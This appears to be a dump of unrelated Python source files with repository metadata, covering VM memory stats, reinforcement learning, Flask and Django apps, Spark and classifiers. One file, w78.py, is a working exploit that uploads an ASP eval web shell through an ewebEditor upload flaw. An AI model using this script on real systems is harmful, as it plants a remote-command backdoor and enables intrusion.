'''Retrieves the amount of memory the virtual machine is actively using its
estimated working set size.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemActiveMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemBalloonedMB(self):
'''Retrieves the amount of memory that has been reclaimed from this virtual
machine by the vSphere memory balloon driver (also referred to as the
"vmmemctl" driver).'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemBalloonedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetMemBalloonMaxMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemBalloonMaxMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetMemBalloonTargetMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemBalloonTargetMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemLimitMB(self):
'''Retrieves the upper limit of memory that is available to the virtual
machine. For information about setting a memory limit, see "Limits and
Reservations" on page 14.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemLimitMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetMemLLSwappedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemLLSwappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemMappedMB(self):
'''Retrieves the amount of memory that is allocated to the virtual machine.
Memory that is ballooned, swapped, or has never been accessed is
excluded.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemMappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemOverheadMB(self):
'''Retrieves the amount of "overhead" memory associated with this virtual
machine that is currently consumed on the host system. Overhead
memory is additional memory that is reserved for data structures required
by the virtualization layer.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemOverheadMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemReservationMB(self):
'''Retrieves the minimum amount of memory that is reserved for the virtual
machine. For information about setting a memory reservation, see "Limits
and Reservations" on page 14.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemReservationMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemSharedMB(self):
'''Retrieves the amount of physical memory associated with this virtual
machine that is copy-on-write (COW) shared on the host.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemSharedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemSharedSavedMB(self):
'''Retrieves the estimated amount of physical memory on the host saved
from copy-on-write (COW) shared guest physical memory.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemSharedSavedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemShares(self):
'''Retrieves the number of memory shares allocated to the virtual machine.
For information about how an ESX server uses memory shares to manage
virtual machine priority, see the vSphere Resource Management Guide.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemShares(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemSwappedMB(self):
'''Retrieves the amount of memory that has been reclaimed from this virtual
machine by transparently swapping guest memory to disk.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemSwappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetMemSwapTargetMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemSwapTargetMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemTargetSizeMB(self):
'''Retrieves the size of the target memory allocation for this virtual machine.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemTargetSizeMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemUsedMB(self):
'''Retrieves the estimated amount of physical host memory currently
consumed for this virtual machine's physical memory.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemUsedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetMemZippedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemZippedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetMemZipSavedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemZipSavedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# vim:ts=4:sw=4:et
|
[
"naparuba@gmail.com"
] |
naparuba@gmail.com
|
edde0aa8cdab82be21c8ef2341f0114662f4921c
|
2d89afd5ca29fc2735a00b0440ea7d5408c8e398
|
/Crash Course/chap07/cities.py
|
ca28aba1f3091b08eb1dc268634339b862f19435
|
[] |
no_license
|
TrystanDames/Python
|
6b2c8721606e046d9ff0708569a97d7b78a0f88e
|
68b3f5f160b46fa4e876d58808ff78ac7f2d84df
|
refs/heads/main
| 2023-06-03T14:25:51.638345
| 2021-06-23T08:54:18
| 2021-06-23T08:54:18
| 357,112,394
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 226
|
py
|
prompt = "\nPlease enter the name of a city you have visited:"
prompt += "\n(Enter 'quit' when you are finished.) "
while True:
city = input(prompt)
if city == 'quit':
break
else:
print(f"I'd love to go to {city.title()}!")
|
[
"trystandames08@gmail.com"
] |
trystandames08@gmail.com
|
019278eb3581d9502a8dea534db2529d1d65b1bd
|
b52547e856f3dee82a332105f3b2553133c7e560
|
/ModelFreeRLPolicyLearning/policy_learning_sarsa.py
|
2c874536de7fef43e8b732237fb216c72c461639
|
[] |
no_license
|
yuhsh24/RLlearning
|
0d3410b9254527e74dc932ccf502cd8972d0bb23
|
2a49ac9ea877cae27c0ce513b795c10a2266b166
|
refs/heads/master
| 2021-01-19T05:22:23.013144
| 2016-07-21T09:48:49
| 2016-07-21T09:48:49
| 63,664,017
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,224
|
py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import grid_mdp
import random
random.seed(0)
import matplotlib.pyplot as plt
grid = grid_mdp.Grid_Mdp()
states = grid.getStates()
actions = grid.getActions()
gamma = grid.getGamma()
#epsilon greedy policy#
def epsilon_greedy(qfunc, state, epsilon):
amax = 0
key = "%d_%s"%(state, actions[0])
qmax = qfunc[key]
for i in xrange(len(actions)):
key = "%d_%s"%(state, actions[i])
q = qfunc[key]
if qmax < q:
qmax = q
amax = i
#probability
pro = [0.0 for i in xrange(len(actions))]
pro[amax] += 1 - epsilon
for i in xrange(len(actions)):
pro[i] += epsilon / len(actions)
#choose
r = random.random()
s = 0.0
for i in xrange(len(actions)):
s += pro[i]
if s >= r: return actions[i]
return actions[len(actions) - 1]
best = dict()
def read_best():
f = open("best_qfunc")
for line in f:
line = line.strip()
if len(line) == 0: continue
element = line.split(":")
best[element[0]] = float(element[1])
def compute_error(qfunc):
sum1 = 0.0
for key in qfunc:
error = qfunc[key] - best[key]
sum1 += error * error
return sum1
def sarsa(num_iter1, alpha, epsilon):
x = []
y = []
qfunc = dict()
for s in states:
for a in actions:
key = "%d_%s"%(s, a)
qfunc[key] = 0.0
for iter1 in xrange(num_iter1):
x.append(iter1)
y.append(compute_error(qfunc))
s = states[int(random.random() * len(states))]
a = actions[int(random.random() * len(actions))]
t = False
count = 0
while False == t and count < 100:
key = "%d_%s"%(s,a)
t, s1, r = grid.transform(s,a)
a1 = epsilon_greedy(qfunc, s1, epsilon)
key1 = "%d_%s"%(s1,a1)
qfunc[key] = qfunc[key] + alpha * (r + gamma * qfunc[key1] - qfunc[key])
s = s1
a = a1
count += 1
plt.plot(x,y,"--",label="sarsa alpha=%2.1f epsilon=%2.1f"%(alpha,epsilon))
plt.show(True)
return qfunc;
if __name__ == "__main__":
read_best()
sarsa(1000, 0.2, 0.2)
|
[
"yhshzju@163.com"
] |
yhshzju@163.com
|
8484b482275e2ea081b24eac4c59213d8ff39e93
|
0889098368a18cc6ecfa442cfe86ed10a5ba32d6
|
/myblog/admin.py
|
300fd70c10c84a714d630170dbbed01102456364
|
[] |
no_license
|
waaaaargh/myblog
|
9932ee5606497851f9ad99b4f1da1a9a604495f6
|
95cd823ea70bdc6e835f63590dfa36da5c4e6d25
|
refs/heads/master
| 2016-09-06T09:15:29.069543
| 2015-03-24T04:16:32
| 2015-03-24T04:16:32
| 9,065,605
| 0
| 0
| null | 2013-10-30T12:22:26
| 2013-03-27T23:02:40
|
Python
|
UTF-8
|
Python
| false
| false
| 662
|
py
|
from os.path import join
from myblog import app, model, db, base_path
from flask.ext.admin import Admin
from flask.ext.admin.contrib.sqla import ModelView
from flask.ext.admin.contrib.fileadmin import FileAdmin
admin = Admin(app, name="MyBlog")
class PostView(ModelView):
form_excluded_columns = ['date', 'comments']
admin.add_view(PostView(model.post, db.session))
class CategoryView(ModelView):
form_excluded_columns = ['posts']
admin.add_view(CategoryView(model.category, db.session))
class CommentView(ModelView):
pass
admin.add_view(CommentView(model.comment, db.session))
admin.add_view(FileAdmin(join(base_path, "static"), "/static/"))
|
[
"johannes@weltraumpflege.org"
] |
johannes@weltraumpflege.org
|
c3ff962e9bc2259450ab129275683d0d23c67865
|
2411ee54802c71aa40895e827171f07289194990
|
/w78.py
|
798cb1329435e69c608c816bdb9724c582d3101e
|
[] |
no_license
|
GoodJob567/eweb-exp
|
aeaf14a715279f07307c6761110cdd2dcdff946d
|
26911dbf26563684a40646220788be04e9532fab
|
refs/heads/master
| 2023-02-16T03:28:46.829739
| 2021-01-14T11:30:21
| 2021-01-14T11:30:21
| 329,593,467
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 533
|
py
|
import requests
key="cmd"
requests.get("http://172.16.12.2/admin/ewebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=hack.asp")
# 要上传的文件
f = open('shell.gif', 'w')
f.write('<%eval request("'+key+'")%>')
f.close()
f={'uploadfile':open('shell.gif','rb')}
r=requests.post("http://172.16.12.2/admin/ewebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=hack.asp",files=f).content
i=r.find(b"d('")
r=r[i+3:]
i=r.find(b"'")
print("URL: http://172.16.12.2"+r[:i].decode())
print("key is: "+key)
|
[
"52376699+GoodJob567@users.noreply.github.com"
] |
52376699+GoodJob567@users.noreply.github.com
|
248d8b61cb8796e0a111657d391f2c4e4015226f
|
bb80ddf8324408705a30e8644a2d693252cf54e9
|
/products/migrations/0001_initial.py
|
d675a60a138b0ee81ea285f6556589b60a0cadad
|
[] |
no_license
|
Code-Institute-Submissions/full_stack_stream_four_happy_box
|
483d4286b26825cf4428600b677147fd63201ff0
|
5c2fd5803bc8164d4028702b3859f5eb891d70e3
|
refs/heads/master
| 2020-03-27T19:57:01.538937
| 2018-09-01T18:37:26
| 2018-09-01T18:37:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,339
|
py
|
# Generated by Django 2.0.7 on 2018-07-11 12:06
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(db_index=True, default='', max_length=150)),
('slug', models.SlugField(max_length=150, unique=True)),
],
options={
'verbose_name': 'category',
'ordering': ('name',),
'verbose_name_plural': 'categories',
},
),
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=20)),
('image', models.ImageField(blank=True, upload_to='images')),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(db_index=True, default='', max_length=254)),
('slug', models.SlugField(max_length=100)),
('description', models.TextField(blank=True)),
('brand', models.CharField(default='', max_length=50)),
('price', models.DecimalField(decimal_places=2, max_digits=6)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='products', to='products.Category')),
],
options={
'ordering': ('name',),
},
),
migrations.AddField(
model_name='image',
name='product',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='product_images', to='products.Product'),
),
migrations.AlterIndexTogether(
name='product',
index_together={('id', 'slug')},
),
]
|
[
"larkineva@gmail.com"
] |
larkineva@gmail.com
|
f14053094b1246b3f7886581c70b392f158becb0
|
5b912db9e8bb7fa99d1e0932eb8a0dac7b1382f0
|
/t09_get_rid_of_it/rid.py
|
78d3728d97c74c9cb27f702750a297a07ef4ef65
|
[] |
no_license
|
AwesomeCrystalCat/py_s00
|
3df7b285855ea276736d0a01d98df2d8465ad707
|
f4814a889b49d013b8285ab15992d0a309056ea6
|
refs/heads/main
| 2023-04-05T22:23:42.637972
| 2021-04-09T10:27:13
| 2021-04-09T10:27:13
| 356,228,064
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 63
|
py
|
my_number = 1
print(my_number)
del(my_number)
print(my_number)
|
[
"slavabusya@Selmarinels-MacBook-Pro.local"
] |
slavabusya@Selmarinels-MacBook-Pro.local
|
f8dab2f0e3f3dfa5c4a51b8eadc87e0c3034cb09
|
fd3436480761c48535da13752ed7681abdbd535d
|
/delegate.py
|
4131f9203dd01d50b2ff11f5c38eedbc49f49024
|
[] |
no_license
|
jayantjain100/nfa_computation_delegation
|
ea932047ec0e99ec3490e45d62e86f377596a799
|
9632d5489e6a9332474496fae4d3f82d876c1009
|
refs/heads/master
| 2020-07-24T09:10:49.844887
| 2019-12-02T05:18:01
| 2019-12-02T05:18:01
| 207,878,002
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,680
|
py
|
from nfa import NFA
import socket
from socket_sending import receive_object
from socket_sending import send_object
import argparse
def verify_yes_ans(given_label, final_labels):
if(given_label in final_labels):
return True
else:
return False
parser = argparse.ArgumentParser(description='client that delegates NFA computation to prover and verifies')
parser.add_argument('--ip', metavar='ip', type=str, default='127.0.0.1',
help='the ip address of the server where the prover is running, default is localhost')
parser.add_argument('--port', metavar = 'port', type = int, default = 12345, help='port number of server to connect to, default is 12345 ')
args = parser.parse_args()
def delegate(nfas, input_string, indexes):
to_send = []
corresponding_final_labels = []
print('Creating garbled NFAs...')
for ind in indexes:
my_nfa = nfas[ind]
(gnfa, final_labels) = my_nfa.garble(input_string)
to_send.append(gnfa)
corresponding_final_labels.append(final_labels)
print('Sending garbled NFAs...')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# port = 45000
s.connect((args.ip, args.port))
send_object(s, to_send)
print('Waiting to receive result from prover...')
received_ans = receive_object(s)
print('Received the result.!')
print()
final_ans = []
for ind in range(len(received_ans)):
ans = received_ans[ind]
if(not ans[0]): # no, but unsure
final_ans.append(False)
elif(ans[0] and verify_yes_ans(ans[1], corresponding_final_labels[ind])): # yes, confirmed
final_ans.append(True)
else: # wrong proof given by prover
final_ans.append(False)
return final_ans
|
[
"ansh.sapra2233@gmail.com"
] |
ansh.sapra2233@gmail.com
|
36c64c45720f28189ea436e39cd685e6744f24e4
|
7a37bd797ea067685c887328e3b447e008e8c170
|
/resourceserver/resourceserver/urls.py
|
e551621de72683b31896faeaa5739218174e3612
|
[] |
no_license
|
Telmediq/hydrapoc
|
2e73f1b82d64d9f6b0e429e124923ede080c40a7
|
b22e0a22e97705ced2379e145c798ea2f66de25d
|
refs/heads/master
| 2020-07-14T23:32:30.147831
| 2019-09-17T21:10:04
| 2019-09-17T21:10:04
| 205,427,268
| 0
| 0
| null | 2019-12-05T00:10:34
| 2019-08-30T17:23:05
|
C#
|
UTF-8
|
Python
| false
| false
| 1,059
|
py
|
"""resourceserver URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from resourceserver import views
urlpatterns = [
path('oauth2/init', views.oauth_start, name='oauth2-init'),
path('oauth2/finish', views.oauth_finish, name='oauth2-finish'),
path('login', views.login, name='login'),
path('protected', views.protected),
path('token/<identifier>', views.view_token),
path('admin/', admin.site.urls),
]
|
[
"alex@telmediq.com"
] |
alex@telmediq.com
|
530cc38befdec212750b6f4b4eefc95536c4852c
|
39a7bc82dc6b08dc347816859eddc1ebd590138c
|
/chapter02/06-bisect.insort.py
|
a2a6b85c83d4b643e534321cd93627e1c0eebb3c
|
[] |
no_license
|
mgw2168/fluent_python
|
1a21568a70708b390e169e4126eebe76a0296d29
|
ab075e33290f75d690d455e42d3ff17f4d1e29ba
|
refs/heads/master
| 2020-07-04T22:46:12.695267
| 2019-12-05T08:05:56
| 2019-12-05T08:05:56
| 202,447,177
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 290
|
py
|
import bisect
import random
SIZE = 7
random.seed(1729)
my_list = []
# insort(seq, item)将变量item插入序列seq中,并能保证seq的升序
for i in range(SIZE):
new_item = random.randrange(SIZE*2)
bisect.insort(my_list, new_item)
print('%2d ->' % new_item, my_list)
|
[
"mgw2168@163.com"
] |
mgw2168@163.com
|
ae970afe343d32e40e8270515b8495c93e849c6a
|
bd34847cf9e0e7c57f86c709bd0ab375b3eef682
|
/spark/word_count.py
|
3e27f4a950058d786f358811bf6c98674d325add
|
[] |
no_license
|
vshaveyko/learn_py
|
68ad17c1353859d32997989ae12de6a6ccd113da
|
2ceb5ed599ce59a611fb5ad366c9b45e2db29a82
|
refs/heads/master
| 2021-09-01T22:44:16.980240
| 2017-12-29T01:06:25
| 2017-12-29T01:06:25
| 115,279,253
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 939
|
py
|
'''Print the words and their frequencies in this file'''
import operator
import pyspark
def main():
'''Program entry point'''
#Intialize a spark context
with pyspark.SparkContext("local", "PySparkWordCount") as sc:
#Get a RDD containing lines from this script file
lines = sc.textFile(__file__)
#Split each line into words and assign a frequency of 1 to each word
words = lines.flatMap(lambda line: line.split(" ")).map(lambda word: (word, 1))
#count the frequency for words
counts = words.reduceByKey(operator.add)
#Sort the counts in descending order based on the word frequency
sorted_counts = counts.sortBy(lambda x: x[1], False)
#Get an iterator over the counts to print a word and its frequency
for word,count in sorted_counts.toLocalIterator():
print(u"{} --> {}".format(word, count))
if __name__ == "__main__":
main()
|
[
"vshaveyko@gmail.com"
] |
vshaveyko@gmail.com
|
9518aed6232253576108cf492c812148ebcac253
|
90c9acae92fa0ccb63f796561aef10bb9a3a31c9
|
/python/analyze_db.py
|
37d1f04425e0e684e1da2427fa96e25906abe190
|
[] |
no_license
|
chtlp/witness-mining
|
cc94f4d3249316e15eafa354ef513815fb919326
|
f27455bfab2d9557494e507665418db67fe7b43f
|
refs/heads/master
| 2021-01-19T20:27:48.079120
| 2012-08-08T09:41:54
| 2012-08-08T09:41:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,381
|
py
|
from collections import defaultdict, OrderedDict
import csv, sqlite3, glob, sys, subprocess
from pylab import *
def analyze_columns(col_names, values):
num = len(col_names)
unique_values = [defaultdict(int) for _ in range(num)]
for row in values:
for k, c in enumerate(row):
unique_values[k][c] += 1
col_values = [None] * num
for k in range(num):
tot = sum(unique_values[k].values())
items = sorted(unique_values[k].items(), key = lambda (v, c): -c)[:10]
if sum(map(lambda (v, c): c, items)) >= 0.9 * tot:
col_values[k] = map(lambda (v, c): v, items)
return col_values
def build_count_table(col_values, col_names, values, subj):
i = col_names.index(subj)
assert col_values[i]
num = len(col_values)
count_table = [None] * num
for k in range(num):
if col_values[k]:
count_table[k] = zeros((len(col_values[k]), len(col_values[i])))
for row in values:
u = row[i]
for k, v in enumerate(row):
if col_values[k] and v in col_values[k] and u in col_values[i]:
count_table[k][ col_values[k].index(v), col_values[i].index(u) ] += 1
return count_table
def compute_entropy(count_table, col_names, subj):
ofile = open('analyze_db.log', 'w')
for k, t in enumerate(count_table):
if t is None:
continue
print 'cond_entropy( %s | %s ):\n' % (subj, col_names[k])
supp = t.sum()
ent = 0.0
m, n = t.shape
for i in range(m):
lsum = t[i,:].sum()
for j in range(n):
if t[i,j]:
ent += t[i,j] / supp * log( lsum / t[i,j] )
h_xy = 0.0
for i in range(m):
for j in range(n):
if t[i,j]:
h_xy += (t[i,j] / supp) * log(supp / t[i,j])
h_x = 0.0
for i in range(m):
s = t[i,:].sum()
if s:
h_x += (s / supp) * log(supp / s)
h_y = 0.0
for j in range(n):
s = t[:,j].sum()
if s:
h_y += (s / supp) * log(supp / s)
assert h_x <= h_xy and h_y <= h_xy,'h_x = %.3f, h_y = %.3f, h_xy = %.3f' % (h_x, h_y, h_xy)
print '\tsupport = %d, value = %.3f\n' % (supp, ent)
if not h_x:
continue
mic = (h_x + h_y - h_xy) / min(h_x, h_y)
print '\tmic = %.3f\n' % mic
ofile.write('%s\t%.3f\n' % (col_names[k], mic))
ofile.close()
def analyze_table(col_names, values, subj):
col_values = analyze_columns(col_names, values)
count_table = build_count_table(col_values, col_names, values, subj)
compute_entropy(count_table, col_names, subj)
def analyze_person_accident(conn, cur):
cur.execute("PRAGMA table_info(PERSON)")
c1 = cur.fetchall()
cur.execute("PRAGMA table_info(ACCIDENT)")
c2 = cur.fetchall()
cur.execute('select * from PERSON JOIN ACCIDENT where PERSON.CASENUM == ACCIDENT.CASENUM')
res = cur.fetchall()
cols = map(lambda t: t[1], c1) + map(lambda t: t[1], c2)
analyze_table(cols, res, 'INJ_SEV')
if __name__ == '__main__':
conn = sqlite3.connect('traffic.db')
conn.text_factory = str
cur = conn.cursor()
analyze_person_accident(conn, cur)
cur.close()
conn.close()
|
[
"chnttlp@gmail.com"
] |
chnttlp@gmail.com
|
edcede7c435a63d0e75eb252da4cc153f45acc02
|
68f04671ed3e2aeb2032a4fdecbede89cf9e1832
|
/ridge.py
|
de8b2783a7c235dd6d36114b04259136a70ee35a
|
[] |
no_license
|
sushuang9210/machine_learning_algorithms
|
306c3fa086326cefd2c463f5d16cbe9829abc447
|
4aac5c664816612b1d4f078f5b7a548474bb9534
|
refs/heads/master
| 2020-03-18T17:07:35.444194
| 2018-06-11T04:18:25
| 2018-06-11T04:18:25
| 135,007,939
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 835
|
py
|
import numpy as np
from sklearn.linear_model import RidgeClassifier
class Ridge:
def __init__(self,data_1,data_2,model_parameters):
self.clf = RidgeClassifier(tol=float(model_parameters[0]), solver=model_parameters[1])
num_data_1 = data_1.shape[0]
num_data_2 = data_2.shape[0]
data_1[:,-1] = np.ones((num_data_1))
data_2[:,-1] = np.zeros((num_data_2))
self.train_set = np.concatenate((data_1, data_2),axis=0)
np.random.shuffle(self.train_set)
self.X_train = self.train_set[:,0:-1]
self.y_train = self.train_set[:,-1]
def ridge_train(self):
self.clf.fit(self.X_train,self.y_train)
def ridge_predict(self,test):
output_1 = self.clf.predict(test)
output_2 = np.ones((test.shape[0])) - output_1
return output_1, output_2
|
[
"sushuang9210@gmail.com"
] |
sushuang9210@gmail.com
|
fde0cdf4ea3b11cec022c1c518b01a1f0e60eabc
|
4559036e4b91f064c85214276a526ed566107f1f
|
/surname_rnn/surname/containers.py
|
0a8b4fc2b42148f674fa2146ee9800ea9e96f927
|
[
"Apache-2.0"
] |
permissive
|
sudarshan85/nlpbook
|
f55017e5ec0d20f0bf5816438835322a8eff70e4
|
41e59d706fb31f5185a0133789639ccffbddb41f
|
refs/heads/master
| 2020-04-28T01:49:42.739340
| 2019-05-03T16:09:08
| 2019-05-03T16:09:08
| 174,873,977
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,614
|
py
|
#!/usr/bin/env python
import pandas as pd
from pathlib import Path
from torch.utils.data import DataLoader
class ModelContainer(object):
def __init__(self, model, optimizer, loss_fn, scheduler=None):
self.model = model
self.optimizer = optimizer
self.loss_fn = loss_fn
self.scheduler = scheduler
class DataContainer(object):
def __init__(self, df_with_split: pd.DataFrame, dataset_class, vectorizer_file: Path, batch_size:
int, with_test=True, is_load: bool=True) -> None:
self.train_df = df_with_split.loc[df_with_split['split'] == 'train']
self.val_df = df_with_split.loc[df_with_split['split'] == 'val']
self._bs = batch_size
self.with_test = with_test
self.is_load = is_load
self._lengths = {'train_size': len(self.train_df), 'val_size': len(self.val_df)}
self._n_batches = [self._lengths['train_size'] // self._bs, self._lengths['val_size'] //
self._bs]
if not self.is_load:
print("Creating and saving vectorizer")
train_ds = dataset_class.load_data_and_create_vectorizer(self.train_df)
train_ds.save_vectorizer(vectorizer_file)
self.train_ds = dataset_class.load_data_and_vectorizer_from_file(self.train_df, vectorizer_file)
self.vectorizer = self.train_ds.vectorizer
self.surname_vocab = self.vectorizer.surname_vocab
self.nationality_vocab = self.vectorizer.nationality_vocab
self.train_dl = DataLoader(self.train_ds, self._bs, shuffle=True, drop_last=True)
self.val_ds = dataset_class.load_data_and_vectorizer(self.val_df, self.vectorizer)
self.val_dl = DataLoader(self.val_ds, self._bs, shuffle=True, drop_last=True)
if self.with_test:
self.test_df = df_with_split.loc[df_with_split['split'] == 'test']
self._lengths['test_size'] = len(self.test_df)
self._n_batches.append(self._lengths['test_size'] // self._bs)
self.test_ds = dataset_class.load_data_and_vectorizer(self.test_df, self.vectorizer)
self.test_dl = DataLoader(self.test_ds, self._bs, shuffle=True, drop_last=True)
def get_loaders(self):
return self.train_dl, self.val_dl, self.test_dl
@property
def train_batches(self):
return self._n_batches[0]
@property
def val_batches(self):
return self._n_batches[1]
@property
def test_batches(self):
if not self.with_test:
raise NameError("No test dataset was provided")
return self._n_batches[2]
@property
def vocab_size(self):
return len(self.surname_vocab)
@property
def n_classes(self):
return len(self.nationality_vocab)
@property
def sizes(self):
return self._lengths
|
[
"su0@ornl.gov"
] |
su0@ornl.gov
|
adaa3bcc2f1130b6551be40f14ba5bf15c68f983
|
5117ae47abf2b1c72c5c808b39048ae2686be0f9
|
/listings/models.py
|
6b8b3acddd8045715c14f5018ba637bdbbdbed0d
|
[] |
no_license
|
nayanpsharma/nayan_property_project
|
a7cc18bbedccf7f12b7bde16658898581ad02146
|
1ef766444696b3049f6e630e6c6a9b75d779c2b4
|
refs/heads/master
| 2022-12-18T21:57:47.426545
| 2020-09-18T21:16:26
| 2020-09-18T21:16:26
| 296,731,065
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,445
|
py
|
from django.db import models
from datetime import datetime
from realtors.models import Realtor
class Listing(models.Model):
realtor = models.ForeignKey(Realtor, on_delete=models.DO_NOTHING)
title = models.CharField(max_length=200)
address = models.CharField(max_length=200)
city = models.CharField(max_length=100)
state = models.CharField(max_length=100)
zipcode = models.CharField(max_length=20)
description = models.TextField(blank=True)
price = models.IntegerField()
bedrooms = models.IntegerField()
bathrooms = models.DecimalField(max_digits=2, decimal_places=1)
garage = models.IntegerField(default=0)
sqft = models.IntegerField()
lot_size = models.DecimalField(max_digits=5, decimal_places=1)
photo_main = models.ImageField(upload_to='photos/%Y%m/%d/')
photo_1 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
photo_2 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
photo_3 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
photo_4 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
photo_5 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
photo_6 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
is_published = models.BooleanField(default=True)
list_date = models.DateTimeField(default=datetime.now, blank=True)
def __str__(self):
return self.title
|
[
"nayansharma996@gmail.com"
] |
nayansharma996@gmail.com
|
62ab32f13bfb48de1118f28c062ed0d2f5702325
|
6e5c83baa19e09bcc59300d764ce936f8cbe6b5b
|
/pybtex/style/names/plain.py
|
62c0c2ca311b0e086a1a078c4410d14d84d02f38
|
[
"MIT"
] |
permissive
|
rybesh/pybtex
|
84e10b12f6c9ade0de2af638bfc23945109eff6d
|
18e0b5336f07ebc5dc97aa899362fb292ea7bb5a
|
refs/heads/master
| 2016-08-07T20:15:26.865726
